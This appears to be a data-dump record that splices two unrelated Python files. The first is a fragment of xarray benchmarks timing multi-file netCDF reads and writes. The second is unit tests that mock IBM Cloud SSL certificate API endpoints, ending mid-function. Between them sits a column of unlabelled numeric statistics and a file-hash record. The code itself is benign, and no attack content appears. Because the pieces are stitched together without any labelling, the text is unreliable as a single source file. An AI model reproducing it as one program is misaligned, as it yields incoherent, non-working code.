                                     dims=('time', 'lon', 'lat'),
                                     name='bar', encoding=None,
                                     attrs={'units': 'bar units',
                                            'description': 'a description'})
            ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
                                           frac_nan=0.2).astype(np.float32),
                                     coords={'lon': lons, 'lat': lats},
                                     dims=('lon', 'lat'),
                                     name='baz', encoding=None,
                                     attrs={'units': 'baz units',
                                            'description': 'a description'})

            ds.attrs = {'history': 'created for xarray benchmarking'}

            self.ds_list.append(ds)
            self.filenames_list.append('test_netcdf_%i.nc' % i)
class IOWriteMultipleNetCDF3(IOMultipleNetCDF):
    """Benchmark writing the multi-file dataset as NETCDF3_64BIT."""

    def setup(self):
        self.make_ds()
        self.format = 'NETCDF3_64BIT'

    def time_write_dataset_netcdf4(self):
        # The netcdf4 engine can also write the NETCDF3_64BIT format.
        xr.save_mfdataset(self.ds_list, self.filenames_list,
                          engine='netcdf4',
                          format=self.format)

    def time_write_dataset_scipy(self):
        xr.save_mfdataset(self.ds_list, self.filenames_list,
                          engine='scipy',
                          format=self.format)
class IOReadMultipleNetCDF4(IOMultipleNetCDF):
    """Benchmark open_mfdataset over multiple NETCDF4 files (default chunks)."""

    def setup(self):
        # open_mfdataset needs dask even without explicit chunks.
        requires_dask()

        self.make_ds()
        self.format = 'NETCDF4'
        xr.save_mfdataset(self.ds_list, self.filenames_list,
                          format=self.format)

    def time_load_dataset_netcdf4(self):
        xr.open_mfdataset(self.filenames_list, engine='netcdf4').load()

    def time_open_dataset_netcdf4(self):
        # Open only -- measures metadata/graph construction, not the load.
        xr.open_mfdataset(self.filenames_list, engine='netcdf4')
class IOReadMultipleNetCDF3(IOReadMultipleNetCDF4):
    """Benchmark open_mfdataset over multiple NETCDF3 files via scipy."""

    def setup(self):
        requires_dask()

        self.make_ds()
        self.format = 'NETCDF3_64BIT'
        xr.save_mfdataset(self.ds_list, self.filenames_list,
                          format=self.format)

    def time_load_dataset_scipy(self):
        xr.open_mfdataset(self.filenames_list, engine='scipy').load()

    def time_open_dataset_scipy(self):
        # Open only -- measures metadata/graph construction, not the load.
        xr.open_mfdataset(self.filenames_list, engine='scipy')
class IOReadMultipleNetCDF4Dask(IOMultipleNetCDF):
    """Benchmark dask-chunked open/load over multiple NETCDF4 files."""

    def setup(self):
        requires_dask()

        self.make_ds()
        self.format = 'NETCDF4'
        xr.save_mfdataset(self.ds_list, self.filenames_list,
                          format=self.format)

    def time_load_dataset_netcdf4_with_block_chunks(self):
        xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                          chunks=self.block_chunks).load()

    def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
        # Same load, but forcing dask's multiprocessing scheduler.
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                              chunks=self.block_chunks).load()

    def time_load_dataset_netcdf4_with_time_chunks(self):
        xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                          chunks=self.time_chunks).load()

    def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                              chunks=self.time_chunks).load()

    def time_open_dataset_netcdf4_with_block_chunks(self):
        # Open-only variants: measure graph construction without the load.
        xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                          chunks=self.block_chunks)

    def time_open_dataset_netcdf4_with_block_chunks_multiprocessing(self):
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                              chunks=self.block_chunks)

    def time_open_dataset_netcdf4_with_time_chunks(self):
        xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                          chunks=self.time_chunks)

    def time_open_dataset_netcdf4_with_time_chunks_multiprocessing(self):
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_mfdataset(self.filenames_list, engine='netcdf4',
                              chunks=self.time_chunks)
class IOReadMultipleNetCDF3Dask(IOReadMultipleNetCDF4Dask):
    """Dask-chunked read benchmarks for many NETCDF3 files (scipy engine)."""

    def setup(self):
        requires_dask()
        self.make_ds()
        self.format = 'NETCDF3_64BIT'
        xr.save_mfdataset(
            self.ds_list, self.filenames_list, format=self.format)

    def _open_scipy(self, chunks):
        # Helper: open the benchmark files via scipy with the given chunking.
        return xr.open_mfdataset(
            self.filenames_list, engine='scipy', chunks=chunks)

    def time_load_dataset_scipy_with_block_chunks(self):
        with dask.config.set(scheduler="multiprocessing"):
            self._open_scipy(self.block_chunks).load()

    def time_load_dataset_scipy_with_time_chunks(self):
        with dask.config.set(scheduler="multiprocessing"):
            self._open_scipy(self.time_chunks).load()

    def time_open_dataset_scipy_with_block_chunks(self):
        with dask.config.set(scheduler="multiprocessing"):
            self._open_scipy(self.block_chunks)

    def time_open_dataset_scipy_with_time_chunks(self):
        with dask.config.set(scheduler="multiprocessing"):
            self._open_scipy(self.time_chunks)
def create_delayed_write():
    """Return a delayed (``compute=False``) netCDF write of a small dataset."""
    import dask.array as da

    values = da.random.random(300, chunks=(1,))
    dataset = xr.Dataset({'vals': (['a'], values)})
    return dataset.to_netcdf('file.nc', engine='netcdf4', compute=False)
class IOWriteNetCDFDask:
    """Benchmark computing a delayed dask-backed netCDF write."""

    # asv run configuration.
    timeout = 60
    repeat = 1
    number = 5

    def setup(self):
        requires_dask()
        self.delayed = create_delayed_write()

    def time_write(self):
        self.delayed.compute()
class IOWriteNetCDFDaskDistributed:
    """Benchmark the delayed netCDF write executed via a distributed Client."""

    def setup(self):
        try:
            import distributed
        except ImportError:
            # Raising NotImplementedError in setup() makes asv skip the benchmark.
            raise NotImplementedError
        self.client = distributed.Client()
        self.delayed = create_delayed_write()

    def cleanup(self):
        self.client.shutdown()

    def time_write(self):
        self.delayed.compute()
| 36.603563
| 78
| 0.547733
| 1,745
| 16,435
| 4.955874
| 0.104298
| 0.030759
| 0.047179
| 0.041628
| 0.851411
| 0.831869
| 0.795791
| 0.765957
| 0.750347
| 0.74549
| 0
| 0.018215
| 0.338607
| 16,435
| 448
| 79
| 36.685268
| 0.777369
| 0.011622
| 0
| 0.739264
| 0
| 0
| 0.084547
| 0.00827
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165644
| false
| 0.003067
| 0.03681
| 0
| 0.276074
| 0.003067
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07e0a96dc5448ea582baf863e9a4ccac71d8386e
| 42,877
|
py
|
Python
|
test/unit/test_ssl_certificate_api_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_ssl_certificate_api_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_ssl_certificate_api_v1.py
|
KumarGanesanIBM/networking-python-sdk
|
c00801b8cb908496bb1b8635ee0a53513af57639
|
[
"Apache-2.0"
] | 1
|
2020-07-30T10:39:28.000Z
|
2020-07-30T10:39:28.000Z
|
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timezone
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import inspect
import json
import pytest
import responses
from ibm_cloud_networking_services.ssl_certificate_api_v1 import *
crn = 'testString'
zone_identifier = 'testString'
service = SslCertificateApiV1(
authenticator=NoAuthAuthenticator(),
crn=crn,
zone_identifier=zone_identifier
)
base_url = 'https://api.cis.cloud.ibm.com'
service.set_service_url(base_url)
##############################################################################
# Start of Service: SSLCertificate
##############################################################################
# region
#-----------------------------------------------------------------------------
# Test Class for list_certificates
#-----------------------------------------------------------------------------
class TestListCertificates():
    """Unit tests for SslCertificateApiV1.list_certificates()."""

    @responses.activate
    def test_list_certificates_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
        mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with every optional argument supplied.
        response = service.list_certificates(x_correlation_id='testString')

        # Exactly one request must have been made, and it must have succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_list_certificates_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
        mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with required arguments only.
        response = service.list_certificates()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for order_certificate
#-----------------------------------------------------------------------------
class TestOrderCertificate():
    """Unit tests for SslCertificateApiV1.order_certificate()."""

    @responses.activate
    def test_order_certificate_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
        mock_response = '{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}'
        responses.add(
            responses.POST, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Parameter values (cert_type avoids shadowing the builtin `type`).
        cert_type = 'dedicated'
        hosts = ['example.com']

        response = service.order_certificate(
            type=cert_type,
            hosts=hosts,
            x_correlation_id='testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The JSON body sent to the server must echo the parameters.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['type'] == cert_type
        assert req_body['hosts'] == hosts

    @responses.activate
    def test_order_certificate_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs'
        mock_response = '{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "type": "dedicated", "hosts": ["example.com"], "certificates": [{"id": "436627", "hosts": ["example.com"], "status": "active"}], "primary_certificate": 0}'
        responses.add(
            responses.POST, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with no arguments at all.
        response = service.order_certificate()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for delete_certificate
#-----------------------------------------------------------------------------
class TestDeleteCertificate():
    """Unit tests for SslCertificateApiV1.delete_certificate()."""

    @responses.activate
    def test_delete_certificate_all_params(self):
        # Register the mocked endpoint (no body expected on delete).
        url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs/testString'
        responses.add(responses.DELETE, url, status=200)

        # Invoke with the identifier plus the optional correlation id.
        response = service.delete_certificate(
            'testString', x_correlation_id='testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_certificate_required_params(self):
        # Register the mocked endpoint (no body expected on delete).
        url = base_url + '/v1/testString/zones/testString/ssl/certificate_packs/testString'
        responses.add(responses.DELETE, url, status=200)

        # Invoke with the required identifier only.
        response = service.delete_certificate('testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_ssl_setting
#-----------------------------------------------------------------------------
class TestGetSslSetting():
    """Unit tests for SslCertificateApiV1.get_ssl_setting().

    NOTE(review): this operation takes no optional parameters, so the
    all_params and required_params cases are intentionally identical.
    """

    @responses.activate
    def test_get_ssl_setting_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/settings/ssl'
        mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        response = service.get_ssl_setting()

        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_ssl_setting_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/settings/ssl'
        mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        response = service.get_ssl_setting()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_ssl_setting
#-----------------------------------------------------------------------------
class TestChangeSslSetting():
    """Unit tests for SslCertificateApiV1.change_ssl_setting()."""

    @responses.activate
    def test_change_ssl_setting_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/settings/ssl'
        mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.PATCH, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with the setting value to apply.
        value = 'off'
        response = service.change_ssl_setting(value=value)

        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The PATCH body must carry the requested value.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['value'] == value

    @responses.activate
    def test_change_ssl_setting_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/settings/ssl'
        mock_response = '{"success": true, "result": {"id": "ssl", "value": "off", "editable": true, "modified_on": "2017-01-01T05:20:00.12345Z"}, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.PATCH, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with no arguments at all.
        response = service.change_ssl_setting()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for list_custom_certificates
#-----------------------------------------------------------------------------
class TestListCustomCertificates():
    """Unit tests for SslCertificateApiV1.list_custom_certificates().

    NOTE(review): this operation takes no optional parameters, so the
    all_params and required_params cases are intentionally identical.
    """

    @responses.activate
    def test_list_custom_certificates_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates'
        mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        response = service.list_custom_certificates()

        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_list_custom_certificates_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates'
        mock_response = '{"result": [{"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}], "result_info": {"page": 1, "per_page": 2, "count": 1, "total_count": 200}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        response = service.list_custom_certificates()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for upload_custom_certificate
#-----------------------------------------------------------------------------
class TestUploadCustomCertificate():
    """Unit tests for SslCertificateApiV1.upload_custom_certificate()."""

    @responses.activate
    def test_upload_custom_certificate_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates'
        mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.POST, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Dict form of a CustomCertReqGeoRestrictions model.
        geo_restrictions = {'label': 'us'}

        # Remaining parameter values.
        certificate = 'testString'
        private_key = 'testString'
        bundle_method = 'ubiquitous'

        response = service.upload_custom_certificate(
            certificate=certificate,
            private_key=private_key,
            bundle_method=bundle_method,
            geo_restrictions=geo_restrictions,
        )

        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The POST body must echo every parameter.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['certificate'] == certificate
        assert req_body['private_key'] == private_key
        assert req_body['bundle_method'] == bundle_method
        assert req_body['geo_restrictions'] == geo_restrictions

    @responses.activate
    def test_upload_custom_certificate_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates'
        mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.POST, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with no arguments at all.
        response = service.upload_custom_certificate()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_custom_certificate
#-----------------------------------------------------------------------------
class TestGetCustomCertificate():
    """Unit tests for SslCertificateApiV1.get_custom_certificate()."""

    @responses.activate
    def test_get_custom_certificate_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
        mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with the required certificate identifier.
        response = service.get_custom_certificate('testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_custom_certificate_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
        mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with the required certificate identifier.
        response = service.get_custom_certificate('testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for update_custom_certificate
#-----------------------------------------------------------------------------
class TestUpdateCustomCertificate():
    """Unit tests for SslCertificateApiV1.update_custom_certificate()."""

    @responses.activate
    def test_update_custom_certificate_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
        mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.PATCH, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Dict form of a CustomCertReqGeoRestrictions model.
        geo_restrictions = {'label': 'us'}

        # Remaining parameter values.
        certificate = 'testString'
        private_key = 'testString'
        bundle_method = 'ubiquitous'

        response = service.update_custom_certificate(
            'testString',
            certificate=certificate,
            private_key=private_key,
            bundle_method=bundle_method,
            geo_restrictions=geo_restrictions,
        )

        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The PATCH body must echo every parameter.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['certificate'] == certificate
        assert req_body['private_key'] == private_key
        assert req_body['bundle_method'] == bundle_method
        assert req_body['geo_restrictions'] == geo_restrictions

    @responses.activate
    def test_update_custom_certificate_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
        mock_response = '{"result": {"id": "0f405ba2-8c18-49eb-a30b-28b85427780f", "hosts": ["example.com"], "issuer": "/Country=US/Organization=Lets Encrypt/CommonName=Lets Encrypt Authority X3", "signature": "SHA256WithRSA", "status": "active", "bundle_method": "bundle_method", "zone_id": "zone_id", "uploaded_on": "uploaded_on", "modified_on": "modified_on", "expires_on": "expires_on", "priority": 8}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.PATCH, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        # Invoke with the required certificate identifier only.
        response = service.update_custom_certificate('testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for delete_custom_certificate
#-----------------------------------------------------------------------------
class TestDeleteCustomCertificate():
    """Unit tests for SslCertificateApiV1.delete_custom_certificate().

    NOTE(review): this operation has no optional parameters, so the
    all_params and required_params cases are intentionally identical.
    """

    @responses.activate
    def test_delete_custom_certificate_all_params(self):
        # Register the mocked endpoint (no body expected on delete).
        url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
        responses.add(responses.DELETE, url, status=200)

        # Invoke with the required certificate identifier.
        response = service.delete_custom_certificate('testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_custom_certificate_required_params(self):
        # Register the mocked endpoint (no body expected on delete).
        url = base_url + '/v1/testString/zones/testString/custom_certificates/testString'
        responses.add(responses.DELETE, url, status=200)

        # Invoke with the required certificate identifier.
        response = service.delete_custom_certificate('testString')

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_certificate_priority
#-----------------------------------------------------------------------------
class TestChangeCertificatePriority():
    """Unit tests for SslCertificateApiV1.change_certificate_priority()."""

    @responses.activate
    def test_change_certificate_priority_all_params(self):
        # Register the mocked endpoint (no body expected).
        url = base_url + '/v1/testString/zones/testString/custom_certificates/prioritize'
        responses.add(responses.PUT, url, status=200)

        # Dict form of a CertPriorityReqCertificatesItem model.
        priority_item = {
            'id': '5a7805061c76ada191ed06f989cc3dac',
            'priority': 1
        }
        certificates = [priority_item]

        response = service.change_certificate_priority(
            certificates=certificates,
        )

        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The PUT body must carry the priority list.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['certificates'] == certificates

    @responses.activate
    def test_change_certificate_priority_required_params(self):
        # Register the mocked endpoint (no body expected).
        url = base_url + '/v1/testString/zones/testString/custom_certificates/prioritize'
        responses.add(responses.PUT, url, status=200)

        # Invoke with no arguments at all.
        response = service.change_certificate_priority()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_universal_certificate_setting
#-----------------------------------------------------------------------------
class TestGetUniversalCertificateSetting():
    """Unit tests for SslCertificateApiV1.get_universal_certificate_setting().

    NOTE(review): this operation takes no optional parameters, so the
    all_params and required_params cases are intentionally identical.
    """

    @responses.activate
    def test_get_universal_certificate_setting_all_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
        mock_response = '{"result": {"enabled": true}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        response = service.get_universal_certificate_setting()

        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_universal_certificate_setting_required_params(self):
        # Register the mocked endpoint.
        url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
        mock_response = '{"result": {"enabled": true}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(
            responses.GET, url,
            body=mock_response,
            content_type='application/json',
            status=200)

        response = service.get_universal_certificate_setting()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_universal_certificate_setting
#-----------------------------------------------------------------------------
class TestChangeUniversalCertificateSetting():
    """Unit tests for SslCertificateApiV1.change_universal_certificate_setting()."""

    @responses.activate
    def test_change_universal_certificate_setting_all_params(self):
        # Register the mocked endpoint (no body expected).
        url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
        responses.add(responses.PATCH, url, status=200)

        # Invoke with the flag to apply.
        enabled = True
        response = service.change_universal_certificate_setting(enabled=enabled)

        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The PATCH body must carry the flag.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['enabled'] == enabled

    @responses.activate
    def test_change_universal_certificate_setting_required_params(self):
        # Register the mocked endpoint (no body expected).
        url = base_url + '/v1/testString/zones/testString/ssl/universal/settings'
        responses.add(responses.PATCH, url, status=200)

        # Invoke with no arguments at all.
        response = service.change_universal_certificate_setting()

        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for get_tls12_setting
#-----------------------------------------------------------------------------
class TestGetTls12Setting():
    """Unit tests for get_tls12_setting()."""

    @responses.activate
    def test_get_tls12_setting_all_params(self):
        # Register the mocked GET endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
        canned_json = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.GET, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Invoke the operation under test.
        response = service.get_tls12_setting()

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_tls12_setting_required_params(self):
        # Register the mocked GET endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
        canned_json = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.GET, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Invoke with required parameters only (none beyond defaults).
        response = service.get_tls12_setting()

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200
#-----------------------------------------------------------------------------
# Test Class for change_tls12_setting
#-----------------------------------------------------------------------------
class TestChangeTls12Setting():
    """Unit tests for change_tls12_setting()."""

    @responses.activate
    def test_change_tls12_setting_all_params(self):
        # Register the mocked PATCH endpoint with a canned JSON payload.
        endpoint = base_url + '/v1/testString/zones/testString/settings/tls_1_2_only'
        canned_json = '{"result": {"id": "tls_1_2_only", "value": "on", "editable": true, "modified_on": "2019-01-01T12:00:00"}, "success": true, "errors": [["errors"]], "messages": [{"status": "OK"}]}'
        responses.add(responses.PATCH, endpoint,
                      body=canned_json,
                      content_type='application/json',
                      status=200)

        # Call the service with every supported parameter.
        value = 'on'
        response = service.change_tls12_setting(
            value=value,
        )

        # Exactly one HTTP call was made and it succeeded.
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # The request body must carry the parameter we supplied.
